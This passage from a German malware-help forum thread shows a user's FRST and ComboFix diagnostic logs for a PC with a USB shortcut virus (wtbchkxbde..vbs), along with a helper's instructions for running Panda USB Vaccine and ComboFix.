Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6029 - Realtek Semiconductor Corp.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
Skype™ 6.14 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.14.104 - Skype Technologies S.A.)
TeraCopy 2.27 (HKLM\...\TeraCopy_is1) (Version:  - Code Sector)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2468871) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2533523) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2600217) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft Access 2010 (KB2553446) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{FEF4C57D-0975-4D3C-ACC7-DCD038C3788F}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2837594) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{99A0DB9A-71FC-4F98-BC1F-78A18195C677}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{DB0B0CDF-77EC-47B0-94E2-4738573A1E58}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817396) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{1AA82E2E-7DB7-4C70-910C-BBB657A6B3A5}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{79C725A1-3964-421C-A528-78C1C083C7C7}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{EBD18DE5-BC84-4B57-9A30-097044871F9A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{B6AD7E27-012A-4B63-82BA-AF62893E5435}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{07DC9C6C-E916-4F42-8677-716930ED0393}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825640) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{43F59F4D-7179-497E-BE99-BC6F7D1DDCBA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825640) 64-Bit Edition (HKLM\...\{90140000-0044-0407-1000-0000000FF1CE}_Office14.PROPLUS_{43F59F4D-7179-497E-BE99-BC6F7D1DDCBA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 64-Bit Edition (HKLM\...\{90140000-001F-0407-1000-0000000FF1CE}_Office14.PROPLUS_{64D96F30-CF4C-4CCE-AAF2-F8909348BF35}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 64-Bit Edition (HKLM\...\{90140000-001F-040C-1000-0000000FF1CE}_Office14.PROPLUS_{9F6507AC-7D8F-46C1-B90F-59C7828E0E0D}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2863818) 64-Bit Edition (HKLM\...\{90140000-001F-0409-1000-0000000FF1CE}_Office14.PROPLUS_{A9C4BE58-07E0-473D-AE68-ECBA13FBF77E}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878225) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{8A6BDA63-4D23-4485-A466-8979E10BCF49}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878225) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{8A6BDA63-4D23-4485-A466-8979E10BCF49}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{DDDC32A5-9528-4771-B91A-97A8E1D7957B}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 64-Bit Edition (HKLM\...\{90140000-001A-0407-1000-0000000FF1CE}_Office14.PROPLUS_{6164E0E5-C903-488C-93AF-1B7AF7EBC331}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2553145) 64-Bit Edition (HKLM\...\{90140000-0018-0407-1000-0000000FF1CE}_Office14.PROPLUS_{BEA3259E-14B5-4D89-87FF-ED9F1D0D81C8}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2775360) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{BE1D254A-E5CD-4E76-9BE8-7B2E5FDBA6AF}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{77374F16-2DC6-4EEF-AFAD-C59FDA2E010D}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{77374F16-2DC6-4EEF-AFAD-C59FDA2E010D}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2810066) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{DF33B92A-5381-4F03-AB54-2D67086B357E}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2837593) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{A82E26EF-680E-427D-B7D0-FD7997DDC217}) (Version:  - Microsoft)
VLC media player 2.0.6 (HKLM\...\VLC media player) (Version: 2.0.6 - VideoLAN)
VR-NetWorld (HKLM-x32\...\{8815F011-43AF-4F50-BBD8-D78ED3D6F5B9}) (Version:  - )
Windows Live Communications Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4311.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
WinRAR 4.20 (32-Bit) (HKLM-x32\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)

==================== Restore Points  =========================

04-03-2014 03:23:52 Windows Update
04-03-2014 12:08:17 Windows Live Essentials
04-03-2014 12:11:06 Windows Update
04-03-2014 12:13:06 Windows Update
04-03-2014 12:13:55 DirectX wurde installiert
04-03-2014 12:14:27 DirectX wurde installiert
04-03-2014 12:15:14 DirectX wurde installiert
04-03-2014 12:16:48 WLSetup
14-03-2014 02:00:37 Windows Update
23-03-2014 22:56:32 Geplanter Prüfpunkt

==================== Hosts content: ==========================

2009-07-14 04:34 - 2014-02-25 18:48 - 00000853 ____N C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

Task: {1F2FE24C-4B0D-45D4-8B60-A98B45D048CA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16] (Google Inc.)
Task: {5ADA0D06-B2AE-41FA-B409-CCC39DFB0EF2} - System32\Tasks\{95AAC210-9BFE-40A9-AF62-1A23A8FF05C6} => Chrome.exe hxxp://ui.skype.com/ui/0/4.1.0.179.367/de/abandoninstall?source=lightinstaller&amp;page=tsProblems&amp;LastError=404&amp;installinfo=google-toolbar:notoffered;notincluded,google-chrome:notoffered;notincluded
Task: {A375B6A6-9D4A-471F-A303-95C4CA7AD0FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
Task: {BBBBFC89-6720-42F2-9EB0-F18DE5DD0B9E} - System32\Tasks\{1035BE4D-F19C-4FDC-9E19-49D3A845A3FF} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=4.1.0.179.367&amp;LastError=404
Task: {E072B638-8F77-4687-8C9B-4EA80C5B4038} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16] (Google Inc.)
Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2011-03-21 16:19 - 2011-03-21 16:19 - 00053248 _____ () C:\Program Files\NetLimiter 3\nlsvcPS.dll
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2013-04-16 21:32 - 2011-10-26 17:41 - 00318976 _____ () C:\Program Files\TeraCopy\TeraCopyExt64.dll
2013-04-16 21:32 - 2011-10-26 17:41 - 00126464 _____ () C:\Program Files\TeraCopy\TeraCopy64.dll
2010-03-26 10:41 - 2010-03-26 10:41 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2013-04-16 20:01 - 2013-04-16 20:01 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2013-04-16 21:58 - 2013-04-16 21:58 - 00397704 _____ () C:\Program Files (x86)\Avira\AntiVir Desktop\sqlite3.dll
2014-02-12 21:58 - 2014-02-12 21:58 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-02-12 21:58 - 2014-02-12 21:58 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2010-03-09 02:18 - 2010-03-09 02:18 - 00465576 _____ () C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\sqlite3.dll
2010-03-09 02:13 - 2010-03-09 02:13 - 01081600 _____ () C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\ACE.dll
2013-04-17 04:50 - 2009-05-21 00:02 - 00072200 _____ () C:\Program Files (x86)\Launch Manager\CdDirIo.dll
2014-02-12 21:58 - 2014-02-12 21:58 - 00237384 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2014-04-02 08:03 - 2014-03-15 02:50 - 00051016 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\chrome_elf.dll
2014-04-02 08:03 - 2014-03-15 02:50 - 00716616 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\libglesv2.dll
2014-04-02 08:03 - 2014-03-15 02:50 - 00100168 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\libegl.dll
2014-04-02 08:03 - 2014-03-15 02:50 - 04061000 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll
2014-04-02 08:03 - 2014-03-15 02:50 - 00394568 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll
2014-04-02 08:03 - 2014-03-15 02:50 - 01647432 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ffmpegsumo.dll

==================== Alternate Data Streams (whitelisted) =========


==================== Safe Mode (whitelisted) ===================


==================== Disabled items from MSCONFIG ==============

MSCONFIG\startupfolder: C:^Users^Franz^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Franz^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Tintenwarnungen überwachen - HP Officejet 4620 series (Netzwerk).lnk => C:\Windows\pss\Tintenwarnungen überwachen - HP Officejet 4620 series (Netzwerk).lnk.Startup
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: HP Officejet 4620 series (NET) => "C:\Program Files\HP\HP Officejet 4620 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN298240ZB05S1:NW" -scfn "HP Officejet 4620 series (NET)" -AutoStart 1

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (04/14/2014 10:31:23 AM) (Source: Application Hang) (User: )
Description: Programm VRNetWorld.exe, Version 5.1.0.12 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: fe0

Startzeit: 01cf57ba07163d71

Endzeit: 0

Anwendungspfad: C:\Program Files (x86)\VR-NetWorld\VRNetWorld.exe

Berichts-ID: 7c160182-c3ae-11e3-b796-00262dac37ec

Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25252272

Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25252272

Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25251258

Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25251258

Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25250244

Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25250244

Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second


System errors:
=============
Error: (04/14/2014 10:43:16 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (04/14/2014 10:43:16 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (04/14/2014 10:38:47 AM) (Source: Disk) (User: )
Description: Der Treiber hat einen Controllerfehler auf \Device\Harddisk1\DR1 gefunden.

Error: (04/14/2014 10:38:44 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (04/14/2014 10:38:32 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (04/14/2014 10:38:30 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (04/14/2014 10:38:30 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (04/14/2014 10:38:30 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (04/14/2014 10:38:28 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (04/14/2014 10:38:27 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.


Microsoft Office Sessions:
=========================
Error: (04/14/2014 10:31:23 AM) (Source: Application Hang)(User: )
Description: VRNetWorld.exe5.1.0.12fe001cf57ba07163d710C:\Program Files (x86)\VR-NetWorld\VRNetWorld.exe7c160182-c3ae-11e3-b796-00262dac37ec

Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25252272

Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25252272

Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25251258

Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25251258

Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25250244

Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25250244

Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: Continuously busy for more than a second


CodeIntegrity Errors:
===================================
  Date: 2014-03-05 15:59:48.934
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-03-01 13:30:45.600
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-03-01 13:30:33.518
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-03-01 13:25:21.861
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-03-01 12:27:05.166
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-02-28 14:14:30.022
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-02-28 14:14:25.270
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.


==================== Memory info =========================== 

Percentage of memory in use: 51%
Total physical RAM: 3764.43 MB
Available physical RAM: 1835.11 MB
Total Pagefile: 7526.99 MB
Available Pagefile: 4673.9 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB

==================== Drives ================================

Drive c: (ACER) (Fixed) (Total:452.97 GB) (Free:30.45 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 466 GB) (Disk ID: 59D459D4)
Partition 1: (Not Active) - (Size=13 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=453 GB) - (Type=07 NTFS)

==================== End Of Log ============================
         
__________________

Alt 15.04.2014, 11:29   #4
schrauber
/// the machine
/// TB-Ausbilder
 

Flash Drive Shortcut Virus wtbchkxbde..vbs - Standard

Flash Drive Shortcut Virus wtbchkxbde..vbs



Sticks anklemmen, nicht mehr abmachen.


Panda USB Vaccine - Download - Filepony
Das laufen lassen zum Absichern des Sticks.




Scan mit Combofix
WARNUNG an die MITLESER:
Combofix sollte ausschließlich ausgeführt werden, wenn dies von einem Teammitglied angewiesen wurde!

Downloade dir bitte Combofix vom folgenden Downloadspiegel: Link
  • WICHTIG: Speichere Combofix auf deinem Desktop.
  • Deaktiviere bitte alle deine Antivirensoftware sowie Malware/Spyware Scanner. Diese können Combofix bei der Arbeit stören. Combofix meckert auch manchmal trotzdem noch, das kannst du dann ignorieren, mir aber bitte mitteilen.
  • Starte die Combofix.exe und folge den Anweisungen auf dem Bildschirm.
  • Während Combofix läuft bitte nicht am Computer arbeiten, die Maus bewegen oder ins Combofixfenster klicken!
  • Wenn Combofix fertig ist, wird es ein Logfile erstellen.
  • Bitte poste die C:\Combofix.txt in deiner nächsten Antwort (möglichst in CODE-Tags).
Hinweis: Solltest du nach dem Neustart folgende Fehlermeldung erhalten
Es wurde versucht, einen Registrierungsschlüssel einem ungültigen Vorgang zu unterziehen, der zum Löschen markiert wurde.
starte den Rechner einfach neu. Dies sollte das Problem beheben.

__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009

Spenden
Anleitungen und Hilfestellungen
Trojaner-Board Facebook-Seite

Keine Hilfestellung via PM!

Alt 16.04.2014, 09:41   #5
fxak
 
Flash Drive Shortcut Virus wtbchkxbde..vbs - Standard

Flash Drive Shortcut Virus wtbchkxbde..vbs



combofix.txt:

Code:
ATTFilter
ComboFix 14-04-12.01 - Franz 16.04.2014   2:59.1.4 - x64
Microsoft Windows 7 Home Premium   6.1.7600.0.1252.49.1031.18.3764.1845 [GMT 2:00]
ausgeführt von:: c:\users\Franz\Desktop\ComboFix.exe
AV: Avira Desktop *Disabled/Outdated* {4D041356-F94D-285F-8768-AAE50FA36859}
SP: Avira Desktop *Disabled/Outdated* {F665F2B2-DF77-27D1-BDD8-9197742422E4}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Neuer Wiederherstellungspunkt wurde erstellt
.
.
((((((((((((((((((((((((((((((((((((   Weitere Löschungen   ))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Franz\AppData\Local\Microsoft\Windows\Temporary Internet Files\{4270F4AC-2AD7-488D-8E81-BDC8F71DD41B}.xps
c:\windows\Temp\log.txt
c:\windows\wininit.ini
.
.
(((((((((((((((((((((((   Dateien erstellt von 2014-03-16 bis 2014-04-16  ))))))))))))))))))))))))))))))
.
.
2014-04-16 01:14 . 2014-04-16 01:14	--------	d-----w-	c:\users\Default\AppData\Local\temp
2014-04-16 00:52 . 2014-04-16 00:52	--------	d-----w-	c:\programdata\Panda Security
2014-04-16 00:52 . 2014-04-16 00:52	--------	d-----w-	c:\program files (x86)\Panda USB Vaccine
2014-04-14 08:43 . 2014-04-14 08:45	--------	d-----w-	C:\FRST
2014-04-07 07:32 . 2014-04-09 08:19	--------	d-----w-	C:\[Smad-Cage]
2014-04-07 07:30 . 2014-04-07 07:30	--------	d-----w-	c:\programdata\Kaspersky Lab Setup Files
2014-04-02 06:19 . 2014-04-02 06:54	--------	d-----w-	c:\users\Franz\AppData\Local\NPE
2014-04-02 06:19 . 2014-04-02 06:19	--------	d-----w-	c:\programdata\Norton
2014-04-01 02:51 . 2013-09-22 15:47	73266	--sha-w-	c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
2014-04-01 02:51 . 2013-09-22 15:47	73266	----a-w-	c:\users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-03-25 07:40 . 2014-03-25 07:40	--------	d-----w-	C:\found.001
2014-03-21 05:44 . 2014-03-23 23:36	--------	d-----w-	c:\users\Franz\AppData\Local\Microsoft Games
.
.
.
((((((((((((((((((((((((((((((((((((   Find3M Bericht   ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-04 12:17 . 2012-07-17 13:37	22240	----a-w-	c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
.
.
((((((((((((((((((((((((((((   Autostartpunkte der Registrierung   ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt. 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	131248	----a-w-	c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	131248	----a-w-	c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	131248	----a-w-	c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
